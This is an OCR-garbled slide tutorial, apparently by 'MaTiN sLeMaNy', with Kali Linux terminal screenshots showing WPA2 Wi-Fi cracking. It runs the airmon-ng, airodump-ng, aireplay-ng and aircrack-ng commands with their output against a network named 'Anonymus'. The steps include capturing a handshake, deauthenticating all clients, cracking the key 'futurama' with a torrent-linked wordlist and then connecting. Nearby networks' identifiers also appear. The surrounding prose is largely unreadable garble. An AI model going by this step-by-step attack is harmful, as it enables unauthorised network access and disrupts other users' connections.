BY : MaTiN sLeMaNy 


^IjS ^jU t ^ 

jj jlj4 JjS jAA 4j4J4j l_5JuAA ^VAj i -ijS ^gjoilj ^gjlj^. 4 j jjj jAjuojU jjj^J 

J^JLJ dbolj^p 


ö j4jAj jUjlSûjUjjojj <1 l_5JuAA ^g-oVûj ^JJJjjl jJ (JûjU (jljjAAj 


,û jAjUaSû j4 jj J« o jS 4 j jjA^ûJ A^Ukj | Uûj4_uo -|— 

. j£ ‘ ûjjj jUj <SUkj <_$ jU usb c chAp ^ 4- 

jj jU»4jLuojA3jAjjjj jAj \ ifconfig 4-^ jjL i ûjûjA5U l_5U1Ujuûjjj Ujuojj 4- 

û jjJ jUoASû jAjjJjo jS jS <S Cliijj L 



:-# ifconfig 

eth0 Link encap :Ethernet HWaddr ] 1 ■ 

UP BROADCAST MULTICAST MTU:1500 Met ric : 1 
RX packets:0 errors:0 dropped:0 overruns:© frame:0 
TX packets:0 errors:0 dropped:0 overruns:© carrier:0 
collisions:0 txqueueTen : 1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 

To Link encap:LocaT Loopback 

inet addr:127. 0.0.1 Mask :255 .0 .0 .0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU: 65536 Met ric : 1 

RX packets:48 errors:0 dropped:0 overruns:© frame:0 

TX packets:48 errors:0 dropped:0 overruns:© carrier:0 

coTTisions:0 txqueueTen:0 

RX bytes:3360 (3.2 KiB) TX bytes:336G (3.2 KiB) 

wTanG Link encap :Ethernet HWaddr 

inet addr:192. 168.1 .102 Bcast : 192 . 168 . 1 .255 Mask :255 .255 .255 .0 
inet6 addr: Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:15GG Met ric : 1 
RX packets:7G66 errors:0 dropped:G overruns:G frame:G 
TX packets:4985 errors:0 dropped:G overruns:G carrier:G 
coTTisions:8 txqueueTen : 10GG 

RX bytes :9865125 (9.4 MiB) TX bytes:476492 (465.3 KiB) 


i:-# | 




BY : MaTiN sLeMaNy 


e jAj jAjAJ 4 AjAA wlanO ^^-uiJAajAjjj jLalui Jjj IgjAj A-ÛJJ ûjjI -I- 

; Aj jj<5Lj (JjAjuijJ a5^1£AjuojA3jAj1ij jjjl jjAj 


ifconfig <name of the interface> down 


root@kali: " 1 

FiLe Edit View Search TerminaL HeLp 


inet6 addr: Scope:Link 

UP BROADCAST RUNNING HULTICAST MTU : 1500 Hetric:l 
RX packets:7066 errors:0 dropped:0 overruns:0 frame:0 
TX packets:4985 errors:0 dropped:© overruns:© carrier:0 
collisions:0 txqueuelen:100O 

RX bytes:9865125 (9.4 HiB) TX bytes:476492 (465.3 KiB) 

:-# ifconfig eth0 down 
.i:~# ifconfig 

lo Link encap:Local Loopback 

inet addr:127. 0.0.1 Hask:255. 0.0.0 

inet6 addr: : : 1/128 Scope:Host 

UP LOOPBACK RUNNING HTU: 65536 Hetric:l 

RX packets:48 errors:0 dropped:0 overruns:0 frame:0 

TX packets:48 errors:0 dropped:0 overruns:© carrier:© 

collisions:0 txqueuelen:© 

RX bytes:3360 (3.2 KiB) TX bytes:3360 (3.2 KiB) 

wlan0 Link encap :Ethernet HWaddr i 

inet addr:192. 168. 1.102 Bcast : 192. 168.1 .255 Hask:255. 255. 255.0 
inet6 addr: Scope:Link 

UP BROADCAST RUNNING HULTICAST HTU:1500 Metric:l 
RX packets:7227 errors:0 dropped:© overruns:© frarne:© 

TX packets:4985 errors:0 dropped:© overruns:© carrier:0 
collisions:0 txqueuelen : 1000 

RX bytes:9916183 (9.4 HiB) TX bytes:476492 (465.3 KiB) 


root@kali:~# | 



BY : MaTiN sLeMaNy 


airmon-ng start wlanO 


♦♦ V £ 

JjoLL J 




root@kaLi: w 


FiLe Edit View Search TerminaL HeLp 



inet addr : 192 . 168 . 1 . 102 Bcast:192. 

168.1.255 Mask:255. 255. 255.0 



inet6 addr: 

Scope:Link 



UP BROADCAST RUNNING MULTICAST MTU 

:1500 Metric:l 



RX packets:7227 errors:0 dropped:0 

overruns:0 frame:0 



TX packets:4985 errors:© dropped:© 

overruns:© carrier:© 



collisions:0 txqueuelen : 1000 




RX bytes :9916183 (9.4 MiB) TX byte 

s :476492 (465.3 KiB) 


.i:-# airnon-ng start wlanG 



Found 3 

procossGS that could causG troublG. 



If airodump-ng, aireplay-ng or airtun-ng stops working aftsr 


a short 

period of time, you may want to kill 

(some of) them! 


0 

PID 

Name 



2799 

Netwo rkManager 



2869 

wpa supplicant 



3575 

dhclient 



Process 

with PID 3575 (dhclient) is running on interface wlanD 



iY7 

i\| M 1 \ v / 


Interface Chipset Driver 

îuLbLI LbL IlTLIUULAA 


wlanG 

Atheros AR9271 ath9k - [phy@] 



(monitor mode 

enabled on mon0) 


rootgka 

.i:-4 | 




3^ û^ 4 ci iIjAj (ÛH^ û ^ o 

ûV^ û^'j^ t WiFi ^ û 4 ^ ^-^jj^ 

. kill c ^ Ûêh* 

kill <process ID> 


BY : MaTiN sLeMaNy 


Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them ! 

-e 

PID Name 

2799 NetworkManager 

2869 wpa_supplicant 

3575 dhclient 

Process with PID 3575 [dhclient ) is running on interface wlanD 


Interface Chipset Driver 

wlanO Atheros AR9271 ath9k - [phyö] 

(monitor mode enabled on monQ) 

rootOkali:*# kill 2799 UULfuLbU LbL 

li:*# kill 2869 

ootflkali:*'# kill 3575 


BY : MaTiN sLeMaNy 



ifconfig j* Ll^ 



. monO l ‘ ^ j jL^d jLi ^^sUuLMijAiuj 


root(§}kali: ~ 


FiLe Edit View Search TerminaL HeLp 



:-# ifconfig 

lo Link encap:Local Loopback 

inet addr:127. 0.0.1 Mask :255 .0 .3 .0 

inet6 addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING MTU:65536 Met ric : 1 

RX packets:52 errors:© dropped:© ouerruns:© frame:0 

TX packets:52 errors:0 dropped:© overruns:© carrier:© 

collisions:0 txqueuelen:0 

RX bytes :3600 (3.5 KiB) TX bytes:3600 (3.5 KiB) 


monG Link encap:UNSPEC HWaddr C4-6E-1F-16-81 -80-00-00-00-00-00-00-00-00-60-00 

UP BROADCAST RUNNING MULTICAST MTU:1506 Met ric : 1 
RX packets : 14888 errors:6 dropped : 14889 overruns:6 frame:6 
TX packets:6 errors:6 dropped:6 overruns:6 carrier:6 
collisions:0 txqueuelen : 1066 
RX bytes : 2566963 (2.4 MiB) TX bytes:G (6.6 B) 


i:~# | 


mm aDGaoDES 



BY : MaTiN sLeMaNy 


<joijjjj AjLûjS LLoiij 

airodump-ng monO 

. a£öjj ySjl jb j <jUjIj c56j 4 jj j jû Jj Cjjûj\£<j 
jLijj jU4£öjjj<5U] jbj j Id j jli ûj 


4- 

'J- 

i- 


■ 


root@kaLi 

FiLe Edit View Search TerminaL HeLp 


CH 1 ][ Elapsed : 1 min ] [ 2615-02-20 21:24 


BSSID 

PWR 

Beacons #Data, 

#/s 

CH 

MB 

ENC 

CIPHER 

AUTH 

ESSID 

1G :FE :ED :B7 : A2 :76 

-45 

1G4 

0 

G 

13 

54e 

WPA2 

CCMP 

PSK 

Anonymus 

F8 : E9 : G3 : F4 : 25 : CC 

-48 

295 

31 

0 

13 

54e 

WPA2 

CCMP 

PSK 

Private Network 

7G : 62 : B8 : C7 : 54 : B4 

-77 

1G5 

1 

0 

1 

54e 

WPA2 

CCMP 

PSK 

bhavesh 

9C : E6 : E7 : 54 : F8 : 85 

-8G 

59 

0 

0 

6 

54e 

WPA2 

CCMP 

PSK 

AndroidAP 

GG:1E:A6:25:29:80 

-85 

25 

0 

0 

6 

54e . 

WPA2 

CCMP 

PSK 

iBaTT -Baton 

GG : 1E : A6 : 18 : 9A : 2C 

-87 

1G 

0 

0 

13 

54e 

WPA2 

CCMP 

PSK 

shiv 

D8 : FE : E3 : 73 : 84 : 3C 

-89 

9 

0 

0 

1 

54e . 

WPA2 

CCMP 

PSK 

Hitesh_Dlink 

C8:D3:A3:15:6B:5G 

-91 

2 

0 

0 

4 

54e . 

WPA2 

CCMP 

PSK 

Amol_Netwo rk 

0G : 22 : 7F : 66 : 2D : 89 

-81 

2 

20 

0 

12 

54e . 

WPA2 

CCMP 

MGT 

<Tength: G> 

G0 : 22 : 7F : 26 : 2D : 89 

-82 

2 

0 

G 

12 

54e . 

WPA2 

CCMP 

MGT 

<length: G> 

BSSID 

STATION 

PWR 

Rate 

Lost 

Frames 

Probe 

(not associated) 

18 : 3B : D2 : 92 : 65 : 9F 

-28 

G 

- 1 


0 

14 



(not associated) 

28 :98 :7B :4G :69 :83 

-91 

G 

- 1 


0 

2 

iBall 

-Baton 

F8 : E9 : G3 : F4 : 25 : CC 



-35 

Ge 

- 1 


0 

32 , 



70 : 62 : B8 : C7 : 54 : 84 

90 : 68 : C3 : 99 : 26 : 4C 

-1 

Ge 

- G 


0 

"AJÎl 1 


■V7 1 

9C:E6:E7:54:F8:85 

DG :B3 :3F :9G :96 :8D 

H 1 

le 

- 0 


0 

1 


k \ 1 


cs^ BSSID * 4i 13 Jta* Al 6J ( ê Anonymus 

. 10:FE:ED:B7:A2:76 



BY : MaTiN sLeMaNy 

•4jq] AjUjS IjjjUb (_ 5 jUJ<A <i ’sj- 

“airodump-ng -c <channel> -w <name> -bssid <bssid> monO” 


root@kaLi: 


N 



FiLe Edit View Search TerminaL HeLp 


CH 11 ][ Elapsed: 3 nins ][ 2015-02-20 21:26 


BSSID 

PWR Beacons #Data, 

#/s 

CH 

HB ENC 

CIPHER 

AUTH 

ESSID 

10 : FE : ED : B7 : A2 : 76 

-60 293 

0 

0 

13 

54e WPA2 

CCMP 

PSK 

Anonymus 

F8:E9:03:F4:25:CC 

-58 834 

47 

0 

13 

54e WPA2 

CCMP 

PSK 

Private Network 

70 : 62 : B8 : C7 : 54 : 84 

-76 265 

14 

0 

1 

54e WPA2 

CCMP 

PSK 

bhavesh 

00:22:7F:A6:2D:88 

-81 4 

0 

0 

12 

54e . WPA2 

CCMP 

PSK 

<length: 0> 

9C:E6:E7:54:F8:85 

-85 161 

0 

0 

6 

54e WPA2 

CCMP 

PSK 

AndroidAP 

00 : 1E : A6 : 25 : 29 : 80 

-86 70 

0 

0 

6 

54e . WPA2 

CCMP 

PSK 

iBall-Baton 

00 : 1E : A6 : 18 :9A :2C 

-89 32 

0 

0 

13 

54e WPA2 

CCMP 

PSK 

shiv 

D8:FE:E3:73:84:3C 

-90 18 

0 

0 

1 

54e . WPA2 

CCMP 

PSK 

Hitesh_Dlink 

00:22:7F:66:2D:89 

-84 7 

20 

0 

12 

54e . WPA2 

CCMP 

MGT 

<length: 0> 

00 : 22 : 7F : 26 : 2D : 89 

-83 5 

0 

0 

12 

54e . WPA2 

CCMP 

MGT 

<length: 0> 

BSSID 

STATION 

PWR 

Rate 

Lost Frames 

Probe 

(not associated) 

18 : 3B : D2 : 92 : 65 : 9F 

-71 

0 

- 1 

4 

28 



(not associated) 

68:05:71 :99 :B6 :E6 

-90 

0 

- 1 

0 

1 



F8:E9:03:F4:25:CC 

■ 1 ■ ■ 1 ■ 

-36 

0e 

- 1 

77 /T\ [ 

54 



70 : 62 : B8 : C7 : 54 : 84 

90:68: C3 : 60 : 98 : 16 

-1 

0e 

- 0 

i \/ 9 \ 

5 



70 : 62 : B8 : C7 : 54 : 84 

0C:1D:AF:75:C0:DC 

-1 

0e 

- 0 


JUg 



9C:E6:E7:54:F8:85 

D0:B3:3F:90:96:8D 

-1 

le 

- 0 

0 

2 




.i :~# airodump-ng -c 13 -w handshake --bssid 10 : FE : ED : B7 : A2 : 76 mon0 


| <_£<Jû j<jûj£j jj j4_^. CJU<JjujJjJJ bûjj] sj_ 

.(capturing data) ûjAjISûJ jS LIj “airodump-ng” . 1 

jL j WiFi ^ vdLka. j^ “<channel>” . 2 

. 6 Run jj ja5L1 





BY : MaTiN sLeMaNy 


Cs^ ûjASOjl jSj£ a£ ^AjUjb j4j "-w" .3 

. <name> ^ 4^j? (Cjjj c_5ojU j<u) jjjjû 

CjJ^. djjjl jj<j Jj t ^jjöJ (j “handshake” l > / c j> U-0* 1 

du j o5Lu 

. ^jS jjjU djûj<juj <i jLûj^LûAj BSSID 


root@kaLi: 


FiLe Edit View Search TerminaL HeLp 


CH 13 ] [ Elapsed : 4 s ][ 2G15-02-2G 21:31 


BSSID 

PWR RXQ 

Beacons 

#Data, #/s 

CH 

MB 

ENC CIPHER 

AUTH 

ESSID 

ÎG :FE :ED :B7 : A2 :76 

-34 1 

65 

55 16 

13 

54e 

WPA2 CCMP 

PSK 

Anonymus 

BSSID 

STATION 


PWR Rate 

Lost 

Frames Probe 


1G :FE :ED :B7 : A2 :76 



-37 Ge - 1 


44 

103 




a£ jjj aJ aJjjj STATION .5 

.(USER) jL 

aJ i oj'i .Vilj diljjjj j j (jojLa j Lka / ^Jujij 

. DATA CACHING 



BY : MaTiN sLeMaNy 


A 


% % 


; 4jj] AjLajS j û jojA^-j û jlj j]l h ■'j}"' LLuJJ 

“aireplay-ng -0 0 -a <bssid> monO” 

4 j^ û^jUj£ c^öjAJ (J^JJ AIxjJjJJ 

^ j^jMj ^ ‘ j^? Data l$ ö jL; c5 j^ 

& JLoilj t Cjjjjjjjj Ij<a û j 

. UjjjöJ J^'j^ cr^ ö . iiUjS ^ ** 
Jji 4J fAS c/Aj 4£ja o-b t jjjAA ûUjj j jtfb j4&U 4- 

M^Lamûj 4j uSo j t JjjjoJ uSCjA^. AjU jUlSöjli t öAjUj£ ^Aj 

. (WPA handshake (ji 


■i- 


File Edit View Search Terminal Help 


CH 13 ][ Elapsed : 2 mins ][ 2015-02-20 21:33 ;[ WPA handshake: 10 :FE :ED :B7 : A2 :76 


PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 


10 :FE :ED :B7 : A2 :76 -35 0 


833 43 13 54e WPA2 CCMP PSK Anonymus 


PWR Rate Lost Frames Probe 


10 :FE :ED :B7 : A2 :76 


-41 0e- 0e 135 


root@kali: ~ 

Edit View Search Terminal Help 


21:32:51 
NB: this 
a connec 
21:32:51 
21:32:52 
21:32:52 
21:32:52 
21:32:53 
21:32:53 
21:32:54 
21:32:54 


CMIO Qllil 


21:32:56 

21:32:57 

21:32:57 

21:32:58 

21:32:58 

21:32:59 

21:32:59 

21:33:00 


:-# aireplay-ng -0 0 -a 10:FE:ED 
Waiting for beacon frame (BSSID 
attack is more effective when ta 
ted wireless client ( -c cclient's 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Şending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Vs ^Sena±nçrDeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 
Sending DeAuth to broadcast -- 


:B7:A2: 
: 10 :FE 
rgeting 
mac>) . 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 
BSSID : 


76 mon0 
:ED:B7:A2: 


76) on channel 


[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 : FE : ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 : FE : ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 
[ 10 :FE :ED 


B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 

B7:A2:76] 



BY : MaTiN sLeMaNy 

. Is ‘ t »JLj 4. 


root@kali: N 

FiLe Edit View Search TerminaL HeLp 


i : — # Is 

Desktop 

handshake-01 .cap 

■ 1 

handshake-61 .csv handshake-01 .kismet .netxml 

handshake-01 .kismet .csv 


mm aom 


Uudi 4 öjjj hanshake UiUjU as jALU j4J ^ajjjöJ 4- 

‘ .cap sJ^i ûUU^jjjj 


.(handshake-Ol.cap) 



BY : MaTiN sLeMaNy 


: j4_b ijjj jj Ajil ûAjLû , j£ jLjL 

aircrack-ng -w <full location of the wordlist> <the file name> 


root@kali: 


FiLe Edit view Search TerminaL HeLp 


i:-# Is 

Desktop handshake-01 .csv handshake-01 .kismet .netxml 

handshake-Öl .cap handshake-01 .kismet .csv 

:~# aircrack-ng -w /media/TRANSCEND/Super-WPA handshake-01 .cap| 



ji ^ wordlist jj ’i- 

j<£j <5o j] jL. CimjJ jtj jj jA^j 


Www.torrenthound.com/hash/3flf5321bl275b33bc0970c743be032be828a4f7/t 

orrent-info/WPA-PSK-WORDLIST-3-Final-13-GB-rar 





BY : MaTiN sLeMaNy 


a1 jLi \jL jjljjûû jbi J- 

C5^it -i? Jj ^ . Crunch 

. <_s-^ j5LLu jû 


root@kaLi: 


HMI 


FiLe Edit view Search TerminaL HeLp 


Aircrack-ng 1.2 beta3 
[00:06:04] 6916 keys tested [1470.48 k/s) 
Current passphrase: iwouldhewere 


Master Key 

: B5 

0B 

D5 

88 

EF 

CC 

D9 

6B 

B6 

CF 

F1 

77 

C6 

59 

35 

3A 


E5 

5C 

4C 

16 

A6 

83 

EB 

DC 

91 

8B 

7A 

BF 

60 

0E 

F8 

B4 

T ransient Key 

: B3 

0B 

1C 

79 

F0 

13 

D2 

2E 

31 

DC 

FE 

92 

97 

7D 

5D 

0B 


7D 

9E 

4B 

B9 

D2 

41 

BD 

1D 

63 

8F 

A0 

78 

6B 

6C 

4B 

E7 


85 

95 

BF 

34 

0A 

70 

61 

5F 

EF 

41 

DA 

AE 

73 

A2 

E4 

0C 


E8 

AF 

3C 

E0 

52 

E0 

99 

26 

49 

05 

5C 

E0 

95 

F4 

E2 

41 


I 


EAPOL HMAC 


: 15 E0 EF 1F 83 6E 71 12 E5 DA 59 FF 66 0F CD 72 




BY : MaTiN sLeMaNy 


root@kali: w 

FiLe Edit View Search TerminaL HeLp 


Aircrack-ng 1.2 beta3 


[00:60:32] 45688 keys tested (1495.68 k/s) 


KEY FOUND ! [ futurama ] 


Master Key 


95 31 73 6A FD 4E 5A 10 02 E9 42 0B 41 E7 DF 8B 
10 D2 BF 1C B5 AC 5C BE 3D 25 72 14 8F E8 A1 B6 


T ransient Key 


44 28 49 88 C5 AE EC EE 3A 3F CF 06 A4 6C 4B 42 
6C 23 81 0F C3 8F 89 4D 89 7A 16 25 E8 5A 1B 26 
95 20 4C 8F 2A 62 4B CD 1D 08 60 EB A9 7C 65 70 
7F OE 53 2E A5 7E D8 75 E3 76 C9 87 E5 2D 49 5F 


EAPOL HMAC 
i : -# | 


09 2E 81 80 7E BB 20 E1 A9 87 48 38 2A DF 60 8B 

f / / A \ 

K V n \LJll I Li 




BY : MaTiN sLeMaNy 


Wireless Network Authentication Required 

Authentication required by wireLess network 

Passwords or encryption keys are required to access the wireless network 
'Anonymus', 



Password: 

futurama 





& Show password 






CanceL 

Connect 


Applications Places 


t B 


Frl Feb 20. 10:02 PM 


<5 H 


2.1 GB Filesystem 


TRANSCEND 



D.DC3QDES 

The quieter you become, the more you are able to hear 


□ [root@kali: -] 


[TRANSCEND] 


■ [Home] 



